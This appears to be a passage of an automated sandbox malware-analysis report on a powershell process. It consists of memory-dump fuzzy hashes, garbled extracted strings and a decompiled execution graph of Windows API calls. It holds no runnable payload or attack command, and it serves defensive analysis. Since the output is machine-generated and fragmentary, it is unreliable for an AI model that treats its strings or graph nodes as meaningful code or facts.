                                                                                                                                                                                    • Opcode Fuzzy Hash: ef092df309a569925cdb3c02be67d51eea25b4f90ddf224ff8c2d994afe03739
                                                                                                                                                                                    • Instruction Fuzzy Hash: 09F02831E092455FCB01A769D8449CEBFB5EF42250F4540FBD0448B253DF28180ACBA2
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2143952057.0000000004300000.00000040.00000800.00020000.00000000.sdmp, Offset: 04300000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_4300000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 5dd180929b5201552a6c7c1b8a4cde64a8f396d73badfc556125db3851f8dd30
                                                                                                                                                                                    • Instruction ID: 223e5f2bc60c87a61a5c0cc229a655d939f01b3e99d9fcde541d14992e4c3b7b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5dd180929b5201552a6c7c1b8a4cde64a8f396d73badfc556125db3851f8dd30
                                                                                                                                                                                    • Instruction Fuzzy Hash: C7F090F9301114AFCB066B38E06882E7BA7EFC8622314401AE807C3390CF79DC028B91
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 196cae6f588692c7ad5dbae23db0eede814aa6ac831bff515795b64e11c5d373
                                                                                                                                                                                    • Instruction ID: 787466fff4534903a3dcc63a1c135f62bca9d75c1ed4752fb7cbaf933641c133
                                                                                                                                                                                    • Opcode Fuzzy Hash: 196cae6f588692c7ad5dbae23db0eede814aa6ac831bff515795b64e11c5d373
                                                                                                                                                                                    • Instruction Fuzzy Hash: C8F0E75090E3C19FD7530B785E265A63F754E53254B1A15DBD080CF2E3D81E494ACBB3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2156214259.0000000008B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B10000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_8b10000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: be68b837d4d3b56d9cb701297096a97f05dbfb483dcebaa1f0690ae86ac974c7
                                                                                                                                                                                    • Instruction ID: 2ef0951cac060cf23d86b8565fc447c0059de8fcf29f99893e3a653679f94adc
                                                                                                                                                                                    • Opcode Fuzzy Hash: be68b837d4d3b56d9cb701297096a97f05dbfb483dcebaa1f0690ae86ac974c7
                                                                                                                                                                                    • Instruction Fuzzy Hash: E2F0F935E00109AFCB05DF98D9408ADFBB6FF88320B248559E514A7260C7329D62DB90
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2143952057.0000000004300000.00000040.00000800.00020000.00000000.sdmp, Offset: 04300000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_4300000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 190d6ae8dcafbe93a7bf20a8ebbb88a687b1944bb016bfe34dc1cea679bbb8fa
                                                                                                                                                                                    • Instruction ID: 21bad8ad0047181e03ca7cf76b3973374592eea9167fc359f36f5005a37523f0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 190d6ae8dcafbe93a7bf20a8ebbb88a687b1944bb016bfe34dc1cea679bbb8fa
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2BF0B4756082848FCB01CB5CD86459CBB70EF4622871981E7C858DB1D3C7366C17C721
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2143952057.0000000004300000.00000040.00000800.00020000.00000000.sdmp, Offset: 04300000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_4300000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                                                                    • Instruction ID: 04fabe12b87a33afef49cb2da06cb232eb5d9894256b8765f93be06e07f56c14
                                                                                                                                                                                    • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 99D017B0D002099F8780EFACC84156EFBF4EB48200F20C5AE8918E3301F732AA12CBD1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                                                                    • API String ID: 0-2779274079
                                                                                                                                                                                    • Opcode ID: 0e37869e66507d52165528cf3e9e8a21d9320bfdebc4577368ef0fcd3cf581d8
                                                                                                                                                                                    • Instruction ID: b7128aa0c10e254e2ced1337c19905663a5c365e8d21c1eef30660937e744296
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e37869e66507d52165528cf3e9e8a21d9320bfdebc4577368ef0fcd3cf581d8
                                                                                                                                                                                    • Instruction Fuzzy Hash: CBC1E531B04348DFDB698F28DA046AA77E2AF81735F24D47EE4198B250DB32D946C791
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q$sl$sl
                                                                                                                                                                                    • API String ID: 0-2468075116
                                                                                                                                                                                    • Opcode ID: 7da8581a383006058027468f30853889e5fb9fba4e87085f4588f0fa01f394a4
                                                                                                                                                                                    • Instruction ID: c94448bab199df20a8d17898757c6cc42cab2eb3952f3a4576eccdafcba33d78
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7da8581a383006058027468f30853889e5fb9fba4e87085f4588f0fa01f394a4
                                                                                                                                                                                    • Instruction Fuzzy Hash: AFA14931F043458FDB655B698A047EBBBE6AF81228F19906FD445CB293DA31C847C7A1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2156268646.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_8b30000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 84{l$84{l$84{l$84{l$tP^q$tP^q$tP^q$tP^q
                                                                                                                                                                                    • API String ID: 0-1026940187
                                                                                                                                                                                    • Opcode ID: 9d04c72274fc20876c0bdbbca7bd79d1c96ca39cc1ef5a3a5058110e8ab89c4a
                                                                                                                                                                                    • Instruction ID: 340e8b2eacde91b187f995753bd20b7f4890e1c500f242e54e1317dd788f3454
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9d04c72274fc20876c0bdbbca7bd79d1c96ca39cc1ef5a3a5058110e8ab89c4a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 16D1F431B40214DFCB14EF68D944A6ABBE2EFC4711F1484AEE8069B355DA31ED43CBA1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2156268646.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_8b30000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 84{l$84{l$84{l$84{l$tP^q$tP^q$tP^q$tP^q
                                                                                                                                                                                    • API String ID: 0-1026940187
                                                                                                                                                                                    • Opcode ID: 2de18c53a0830d53f24f33ee1667e79a806ce51f05900e5b11ab93565659b178
                                                                                                                                                                                    • Instruction ID: 16b0c75dc1b25bd59c7a0c7147e5cc703e9651e86e25b3354eaa4aca53634ac9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2de18c53a0830d53f24f33ee1667e79a806ce51f05900e5b11ab93565659b178
                                                                                                                                                                                    • Instruction Fuzzy Hash: FCC19435B00219DFCF249F58D5546AABBE2FF88712F2488A9E9059B350DB31DC46CBE1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                                                                    • API String ID: 0-3732357466
                                                                                                                                                                                    • Opcode ID: 83c502506c50b5d1a2743a42bd93407499b7e2de6d601398416e14f90a2e80ff
                                                                                                                                                                                    • Instruction ID: 2bb509bde05e107a42ba5fdf649738fb6e248dd3a47fd2cd0fe00f6a5a58cc17
                                                                                                                                                                                    • Opcode Fuzzy Hash: 83c502506c50b5d1a2743a42bd93407499b7e2de6d601398416e14f90a2e80ff
                                                                                                                                                                                    • Instruction Fuzzy Hash: 89A10631E14304DFDB558F29CA446AABBF2EF85224F2884BFD415CB251DB31E866C7A1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 4'^q$84{l$TQcq$TQcq$tP^q$$^q$$^q$$^q
                                                                                                                                                                                    • API String ID: 0-4078397411
                                                                                                                                                                                    • Opcode ID: 11aea78c7c682f9233a81bcc3d8e33d2339d7c8b40c3aad90f54ab9d867f52ab
                                                                                                                                                                                    • Instruction ID: 033b764eaa6470a2de58b0d691add9085d4fca8e466b1d805e297e71709a78e0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 11aea78c7c682f9233a81bcc3d8e33d2339d7c8b40c3aad90f54ab9d867f52ab
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8F51A430A00304DFDBA88F09CB057AA77A1BF44735F14A16EE8159B291DB35DD9ACBD1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: Tmk$4'^q$4'^q$4'^q$DUmk$XY}l$XY}l
                                                                                                                                                                                    • API String ID: 0-2239393233
                                                                                                                                                                                    • Opcode ID: 9aa375d1c1af027768f2795ee37a08da21c80d58e2a3a6037c3b3e5cde5b5748
                                                                                                                                                                                    • Instruction ID: 6d206434d5c5523460fbc3d107d180dd753789139dc2fb6ce5290590fd1e38be
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9aa375d1c1af027768f2795ee37a08da21c80d58e2a3a6037c3b3e5cde5b5748
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2C61E531F043058FDBA4CF68C6446AABBF2EF89634F1490AED605DB255D731DA42C7A1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 4'^q$84{l$d%dq$d%dq$d%dq$tP^q$$^q
                                                                                                                                                                                    • API String ID: 0-589857995
                                                                                                                                                                                    • Opcode ID: 32eea729df1bca8d71cf6467075c5fee3f1df93cee68589232c9c8524f5e0f72
                                                                                                                                                                                    • Instruction ID: 035001624dd264a42caef949f2a6f04f94240fec5fffc1aa8249700483c9c420
                                                                                                                                                                                    • Opcode Fuzzy Hash: 32eea729df1bca8d71cf6467075c5fee3f1df93cee68589232c9c8524f5e0f72
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8751E131A003049FDBA48F14CF50BAAB7E6AF84664F19A07DE8019F295D772DD42C7A1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: tP^q$tP^q$$^q$$^q$$^q$sl$sl
                                                                                                                                                                                    • API String ID: 0-1772042946
                                                                                                                                                                                    • Opcode ID: fe7a49d3f51d908636a7166d3704f4411a015199453e1e0be57a9decfffb642b
                                                                                                                                                                                    • Instruction ID: ace257fa398972c15093f513121ed4af483826de06daa7913189c587fea49665
                                                                                                                                                                                    • Opcode Fuzzy Hash: fe7a49d3f51d908636a7166d3704f4411a015199453e1e0be57a9decfffb642b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 83413D32B083548FD7154B69D904AA6BBE5AFC6674B24815FE444CF3E3CA32DC06C7A1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: tP^q$tP^q$$^q$$^q$$^q$sl$sl
                                                                                                                                                                                    • API String ID: 0-1772042946
                                                                                                                                                                                    • Opcode ID: 946bbe9d98da354a24411a726243c3b8299f57372f2b2a7dc750c0751edb821d
                                                                                                                                                                                    • Instruction ID: 72ad81b5036941ba610e8a86ed9110584ebc6ca361cf0dbc1d6f8508969b3425
                                                                                                                                                                                    • Opcode Fuzzy Hash: 946bbe9d98da354a24411a726243c3b8299f57372f2b2a7dc750c0751edb821d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 00415A32708354CFD7558B299900566BFF1AFC1638B29859FE445CF3A6CA32CC05C3A1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q
                                                                                                                                                                                    • API String ID: 0-445857065
                                                                                                                                                                                    • Opcode ID: d1b03f1f8cb6b39d1cfd7610b51ab4e6d54426baa93afd3bc97008433313ccb8
                                                                                                                                                                                    • Instruction ID: c32406dcd9fb71e4245a16ffa52e94138c2bffdedf1e85c3c902f1195c1621f5
                                                                                                                                                                                    • Opcode Fuzzy Hash: d1b03f1f8cb6b39d1cfd7610b51ab4e6d54426baa93afd3bc97008433313ccb8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4CE13932B043458FCB558B699A1166BBBA2AFC1324F18D46ED406CF295DB32D847C7E2
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 4'^q$84{l$d%dq$d%dq$d%dq$tP^q
                                                                                                                                                                                    • API String ID: 0-1531352656
                                                                                                                                                                                    • Opcode ID: de10e25043da50825e5f26d0dc0616721bdc4187b14139070770f55de7b64812
                                                                                                                                                                                    • Instruction ID: f59113405d6be42d3e8fe5417ab2c06795120c3ad1b57e75142d751ba1a21196
                                                                                                                                                                                    • Opcode Fuzzy Hash: de10e25043da50825e5f26d0dc0616721bdc4187b14139070770f55de7b64812
                                                                                                                                                                                    • Instruction Fuzzy Hash: F4319E70B003149FDB64DF14CA54EAABBE2BF88724F249569E805AF354C772ED42CB90
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                                                                                                                    • API String ID: 0-3272787073
                                                                                                                                                                                    • Opcode ID: e518ce044e5b8c4118acd9d92e2593275fdcbadbb41a4a0a0426836c1e6aea5c
                                                                                                                                                                                    • Instruction ID: 33c7a32c2f18fa833e452f96cd05db0efe2d995b8f2f090129b07959bc95402b
                                                                                                                                                                                    • Opcode Fuzzy Hash: e518ce044e5b8c4118acd9d92e2593275fdcbadbb41a4a0a0426836c1e6aea5c
                                                                                                                                                                                    • Instruction Fuzzy Hash: D2411431B24305DFDB664F24CA106BA7BA1AFC1224F14846ED905CB791DB33CA87C7A2
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 4'^q$4'^q$x.nk$-nk
                                                                                                                                                                                    • API String ID: 0-3747014097
                                                                                                                                                                                    • Opcode ID: beb421d58c1ed9e43eee7bea5d8788e060996a2d9a2e129dfd319bda431ce79a
                                                                                                                                                                                    • Instruction ID: 2caa21a2a5aec43a03770d269b8bf58dddaeb495d28d8c9ed8583ea1336710b8
                                                                                                                                                                                    • Opcode Fuzzy Hash: beb421d58c1ed9e43eee7bea5d8788e060996a2d9a2e129dfd319bda431ce79a
                                                                                                                                                                                    • Instruction Fuzzy Hash: C8023C74A00318DFDB54CF18CA51B9ABBB2BF49304F1185E9D9096B391CB72AD86CF91
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: (f}l$(f}l$(f}l$(f}l
                                                                                                                                                                                    • API String ID: 0-516988632
                                                                                                                                                                                    • Opcode ID: eed3aa13f295539fd349f3a05bfe2b43532f3d216379f8e09be8f5fe24398dca
                                                                                                                                                                                    • Instruction ID: 9d0126a9d81fb8d6d8cec67047d509166291afa7f329a8f9b6fb38ce055f454b
                                                                                                                                                                                    • Opcode Fuzzy Hash: eed3aa13f295539fd349f3a05bfe2b43532f3d216379f8e09be8f5fe24398dca
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3BC15E74E003059FDB54CB98C651AAAB7B3AF88328F25D569D805AB754CB32EC42CB91
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 84{l$84{l$tP^q$tP^q
                                                                                                                                                                                    • API String ID: 0-827238091
                                                                                                                                                                                    • Opcode ID: c67e5b3f88033ea6c7d7f4fded20d3ee46294839db8016900ebdaaeb38aa650b
                                                                                                                                                                                    • Instruction ID: a37cd4d2c8f830cf3fa13c051079300856c8675867b7d3a946418acfde8ea69b
                                                                                                                                                                                    • Opcode Fuzzy Hash: c67e5b3f88033ea6c7d7f4fded20d3ee46294839db8016900ebdaaeb38aa650b
                                                                                                                                                                                    • Instruction Fuzzy Hash: C6812731F003449FC7699F688A41A7BBBE2AB84724F28846EE515DF391DB31DC46C7A1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: (f}l$(f}l$(f}l$(f}l
                                                                                                                                                                                    • API String ID: 0-516988632
                                                                                                                                                                                    • Opcode ID: 640bc874fc79c01c39b9c907054de99689cd136a9ad4eb506f5b72cb92730afd
                                                                                                                                                                                    • Instruction ID: aac56915af57404707c6b68334c3964e0af5bf7eb6ebaae9e854d82d7d6a7b0d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 640bc874fc79c01c39b9c907054de99689cd136a9ad4eb506f5b72cb92730afd
                                                                                                                                                                                    • Instruction Fuzzy Hash: F0715070E002049FDB54CF58CA41AAABBB2AF89324F15916DD8159B355CB72EC42CFA1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: $^q$$^q$$^q$$^q
                                                                                                                                                                                    • API String ID: 0-2125118731
                                                                                                                                                                                    • Opcode ID: 83db13f7285a122c4547e60a9d4003db7a1828150f7a1703935b6e4b2080c05b
                                                                                                                                                                                    • Instruction ID: f7a4a1397a381242550418e39160f0af5894f18bdeea79bf44f9ea5533d93a17
                                                                                                                                                                                    • Opcode Fuzzy Hash: 83db13f7285a122c4547e60a9d4003db7a1828150f7a1703935b6e4b2080c05b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1F2179317103059BEBA8492A9E00B63B7D69BC0725F24D42EA406CB3D5CD35C842C3A1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: $^q$$^q$$^q$$^q
                                                                                                                                                                                    • API String ID: 0-2125118731
                                                                                                                                                                                    • Opcode ID: 1efc62e258d25480a21a216fbffb49eef7fe9ee1b101419efe4e6af668b440f1
                                                                                                                                                                                    • Instruction ID: 507a51ecc89ae6702d40d6da8bc56e4afe686ebae3f2f87a5e95b7bc6568f7b8
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1efc62e258d25480a21a216fbffb49eef7fe9ee1b101419efe4e6af668b440f1
                                                                                                                                                                                    • Instruction Fuzzy Hash: F2219C31D0430E8FDBB58E9DC6446AABBB5AB80334F18E07ED4059B246DB31884BC7A1

                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                    Execution Coverage:24%
                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                    Total number of Nodes:1332
                                                                                                                                                                                    Total number of Limit Nodes:0
                                                                                                                                                                                    execution_graph 8322 402643 8323 402672 8322->8323 8324 402657 8322->8324 8326 4026a2 8323->8326 8327 402677 8323->8327 8325 402d89 21 API calls 8324->8325 8336 40265e 8325->8336 8329 402dab 21 API calls 8326->8329 8328 402dab 21 API calls 8327->8328 8330 40267e 8328->8330 8331 4026a9 lstrlenW 8329->8331 8339 406579 WideCharToMultiByte 8330->8339 8331->8336 8333 402692 lstrlenA 8333->8336 8334 4026d6 8335 4026ec 8334->8335 8337 4060f9 WriteFile 8334->8337 8336->8334 8336->8335 8340 406128 SetFilePointer 8336->8340 8337->8335 8339->8333 8341 406144 8340->8341 8348 40615c 8340->8348 8342 4060ca ReadFile 8341->8342 8343 406150 8342->8343 8344 406165 SetFilePointer 8343->8344 8345 40618d SetFilePointer 8343->8345 8343->8348 8344->8345 8346 406170 8344->8346 8345->8348 8347 4060f9 WriteFile 8346->8347 8347->8348 8348->8334 8478 404f43 GetDlgItem GetDlgItem 8479 404f95 7 API calls 8478->8479 8485 4051ba 8478->8485 8480 40503c DeleteObject 8479->8480 8481 40502f SendMessageW 8479->8481 8482 405045 8480->8482 8481->8480 8484 40507c 8482->8484 8487 406594 21 API calls 8482->8487 8483 40529c 8489 405348 8483->8489 8498 4052f5 SendMessageW 8483->8498 8521 4051ad 8483->8521 8488 4044d6 22 API calls 8484->8488 8485->8483 8486 405229 8485->8486 8496 404e91 5 API calls 8485->8496 8486->8483 8494 40528e SendMessageW 8486->8494 8492 40505e SendMessageW SendMessageW 8487->8492 8493 405090 8488->8493 8490 405352 SendMessageW 8489->8490 8491 40535a 8489->8491 8490->8491 8500 405373 8491->8500 8501 40536c ImageList_Destroy 8491->8501 8513 405383 8491->8513 8492->8482 8497 4044d6 22 API calls 8493->8497 8494->8483 8495 40453d 8 API calls 8499 405549 8495->8499 8496->8486 8502 4050a1 8497->8502 8504 40530a SendMessageW 8498->8504 8498->8521 8506 40537c GlobalFree 8500->8506 8500->8513 8501->8500 8507 40517c GetWindowLongW SetWindowLongW 8502->8507 8512 4050f4 SendMessageW 8502->8512 8515 405177 8502->8515 8518 405132 SendMessageW 8502->8518 8519 405146 SendMessageW 8502->8519 8503 4054fd 8508 40550f ShowWindow GetDlgItem ShowWindow 8503->8508 8503->8521 8505 40531d 8504->8505 8514 40532e SendMessageW 8505->8514 8506->8513 8509 405195 8507->8509 8508->8521 8510 4051b2 8509->8510 8511 40519a ShowWindow 8509->8511 8531 40450b SendMessageW 8510->8531 8530 40450b SendMessageW 8511->8530 8512->8502 8513->8503 8520 404f11 4 API calls 8513->8520 8525 4053be 8513->8525 8514->8489 8515->8507 8515->8509 8518->8502 8519->8502 8520->8525 